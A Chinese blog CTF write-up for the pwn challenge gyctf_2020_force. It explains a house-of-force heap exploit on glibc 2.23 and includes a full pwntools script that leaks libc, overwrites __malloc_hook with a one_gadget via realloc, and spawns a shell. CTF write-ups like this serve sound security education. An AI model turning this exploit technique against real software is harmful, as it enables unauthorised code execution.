gyctf_2020_force

最新推荐文章于 2023-04-11 18:39:21 发布
最新推荐文章于 2023-04-11 18:39:21 发布
阅读量846 收藏
点赞数 1
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/122690495
版权

gyctf_2020_force

查看保护
在这里插入图片描述
在这里插入图片描述

当size小于0x50时堆溢出,这里只有add没有show和edit。size随便申请多大都可以。
house of force吧,改写top chunk的size为0xFFFFFFFFFFFFFFFF因为在glibc2.23下的源码中这里是无符号写成-1时则为0xFFFFFFFFFFFFFFFF。详细可以看z1r0’s blog
当创建top chunk可以分配的大小的,所创建的chunk的位置为top chunk与该chunk size的偏移
所以这里可以进行任意地址申请,只需要将top chunk的size改为0xFFFFFFFFFFFFFFFF。
泄露libc的话,通过mmap来申请,mmap申请的地址与libc为固定偏移。刚好add中有泄露的语句。
最后通过realloc调整栈帧即可getshell

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 26920)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

def add(size, content):
    r.sendline('1')
    r.sendlineafter('size', str(size))
    r.recvuntil('bin addr ')
    addr = int(r.recvuntil('\n'), 16)
    success('bin_addr = ' + hex(addr))
    r.sendafter('content', content)
    return addr

libc = ELF('./libc-2.23.so')

libc_base = add(0x200000, 'aaaa\n') + 0x200ff0
success('libc_base'+hex(libc_base))

p1 = p64(0) * 3 + p64(0xFFFFFFFFFFFFFFFF)
heap_addr = add(0x18, p1)
success("heap_addr:" + hex(heap_addr))

top_chunk_addr = heap_addr + 0x10

malloc_hook = libc.sym['__malloc_hook'] + libc_base
success("malloc_hook" + hex(malloc_hook))
one_gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one_gadget = one_gadget[1] + libc_base
realloc = libc.sym["__libc_realloc"] + libc_base
offset = malloc_hook - top_chunk_addr

add(offset - 0x30, 'aaa\n')

p2 = p64(0) + p64(one_gadget) + p64(realloc + 0x10)
add(0x10, p2)

r.sendline('1')
r.recvuntil("size\n")
r.sendline('16')

r.interactive()
z1r0.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Pwn-gyctf_2020_force
fayinq的博客
03-13 386
gyctf_2020_force 这个题目是一个新的知识点,house_of_force,第一次看,以前没见过。 HOUSE_OF_FORCE: 使用条件: 能够使用溢出等手段,修改top_chunk的大小 能够自由分配chunk大小,不会被限制 基本原理: 在malloc之中,会有一个topchunk的size大小,如果说,能够malloc一个chunk的大小大于topchunk的大小(一般是0x20df1这种个大小),那么chunk就会去到vmmap映射出来的另一端地址,一般来说会在libc上面一点
BUUCTF-PWN gyctf_2020_force(house of force
weixin_44145820的博客
04-15 1351
目录程序分析漏洞分析漏洞利用EXP 程序分析 程序只有添加功能,puts功能没有用 添加功能中,有三个注意点 chunk大小没有限制 可以获得分配空间的地址 读入长度固定为0x50 漏洞分析 根据题目force,可以联想到house of force堆利用方法 以下内容取自ctf-wiki House Of Force 是一种堆利用方法,但是并不是说 House Of Force 必须...
BUUCTF【gyctf_2020_force】(house of force)
weixin_51055545的博客
01-29 639
一道题学习 House of force 首先说明一下House of force的利用条件: 1.能够通过堆溢出等方法控制到topchunk的size 2.分配的大小没有限制,即可以申请任意大小的堆块 3.能够泄露出堆地址(topchunk) House of force 产生的原因: 在于 glibc 对 top chunk 的处理,进行堆分配时,如果所有空闲的块都无法满足需求,那么就会从 top chunk 中分割出相应的大小作为堆块的空间。若 top chunk 的 size 值是由用户控制的任意的
[BUUCTF]PWN——gyctf_2020_force(house of force
mcmuyanga的博客
01-29 926
gyctf_2020_force 附件 步骤
gyctf_2020_force【write up】
m0_73756460的博客
04-11 117
BUUCTF刷题gyctf_2020_force【write up】
BSB.zip_rising force
09-24
《BSB.zip_rising force》是一款于2003年推出的大型多人在线角色扮演游戏(MMORPG),名为"rising force"。这款游戏以其丰富的游戏内容、深度的角色发展和广阔的虚拟世界吸引了众多玩家。下面我们将深入探讨其中涉及...
hal.rar_The Force
09-24
标题中的“hal.rar_The Force”可能是指一个与硬件抽象层(Hardware Abstraction Layer, HAL)相关的项目,而“The Force”可能是项目的一个特定部分或者版本名称,寓意它具有强大的功能,如同科幻电影《星球大战》...
manlifa.rar_brute force_蛮力法
09-23
**蛮力法(Brute Force)详解** 在计算机科学中,蛮力法是一种常见的问题解决策略,特别是在算法设计中。这种方法通常涉及尝试所有可能的解决方案,并选择满足条件的最佳或最合适的。它以其简单直接而著称,但在...
HW1-Q3_b.rar_damping force
07-14
Matlap Vibration damping with force
4[1].7.2(1).rar_force plate
07-13
标题中的"4[1].7.2(1).rar_force plate"似乎是一个文件命名规则,可能代表该资料是某个系列教程或文档中的第四章、第一小节、第七个子问题的第二个部分,主题聚焦在“force plate”,也就是力板上。力板通常用于测量...
【house of forcegyctf_2020_force
huzai9527的博客
04-20 145
【house of forcegyctf_2020_force 1.ida分析 申请任意大小的堆块,存在堆溢出 2.思路 申请一个较大的堆块,泄露libc的地址 修改top chunk的地址为0xffffffffffffffff 计算top chunk到malloc_hook-0x33的距离(malloc_hook-0x23 是一个合法的chunk)其实这个0x30-0x37应该都可以,malloc在分配的时候会自己进行对齐 通过申请到malloc上方的chunk修改mall
i春秋2020新春战役PWN之force
seaaseesa的博客
02-26 806
House of force能够使我们将堆申请到任意地址,满足以下条件,即可达到利用 能够改写top chunk的size域 能够自由控制堆分配大小 能够知道目标地址与top chunk地址之间的距离(可以泄露地址,计算出偏移) 详细见CTF-WIKIhttps://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/house_of_force...
PWN-PRACTICE-BUUCTF-24
P1umH0的博客
09-09 242
PWN-PRACTICE-BUUCTF-24
GYCTF2020_Writeup
Lethe's Blog
03-15 2590
Blacklist 一到注入题,和2019强网杯的随便住基本一致,但是多过滤了set、prepare、alter、rename: return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); 获取表名和列名的方式与原题一致,而获取数据可以参考这篇文章:http...
BUUCTF--[BJDCTF2020]JustRE
Hk_Mayfly的博客
04-07 1401
测试文件:https://www.lanzous.com/ib3dq9c 代码分析 1 BOOL __stdcall DialogFunc(HWND hWnd, UINT a2, WPARAM a3, LPARAM a4) 2 { 3 CHAR String; // [esp+0h] [ebp-64h] 4 5 if ( a2 != 272 ) 6 { ...
gyctf_2020_borrowstack
qq_42728977的博客
04-12 550
栈迁移,这个有点坑。 参考: https://www.cnblogs.com/luoleqi/p/12348341.html
pwngyctf_2020_borrowstack
Nothing
03-02 1622
例行检查 程序逻辑 看到buf缓冲区有0x10大小溢出,且可以控制bss段上的bank,可以用栈迁移做,这题的bss段离got表较近,在迁移时尽量往高地址迁移,防止在rop时破坏got表上数据。 from pwn import * io=remote('node3.buuoj.cn','29302') bank=0x0601080 leave=0x400699 puts_plt=0x0400...
House of force —— gyctf_2020_force
PLpa的博客
08-13 855
前言: House of force是属于House of xxx系列的利用方法,House of xxx是2004年《The Malloc Maleficarum-Glibc Malloc Exploitation Techniques》中提出的一系列针对glibc堆分配机制的利用方法。 想要利用House of force,需要以下条件: 1.能够以溢出等方式控制top chunk的size域。 2.能够自由的分配堆的大小 解题思路 保护机制 保护全开,64位。 IDA查看伪代码 程序有两个功能,
mysql innodb_force_recovery
最新发布
06-09
`innodb_force_recovery` 是 MySQL 中的一个参数,用于修复损坏的 InnoDB 存储引擎的数据。当 InnoDB 存储引擎出现异常时,比如数据文件损坏、日志文件损坏等,可以使用 `innodb_force_recovery` 参数来尝试修复数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值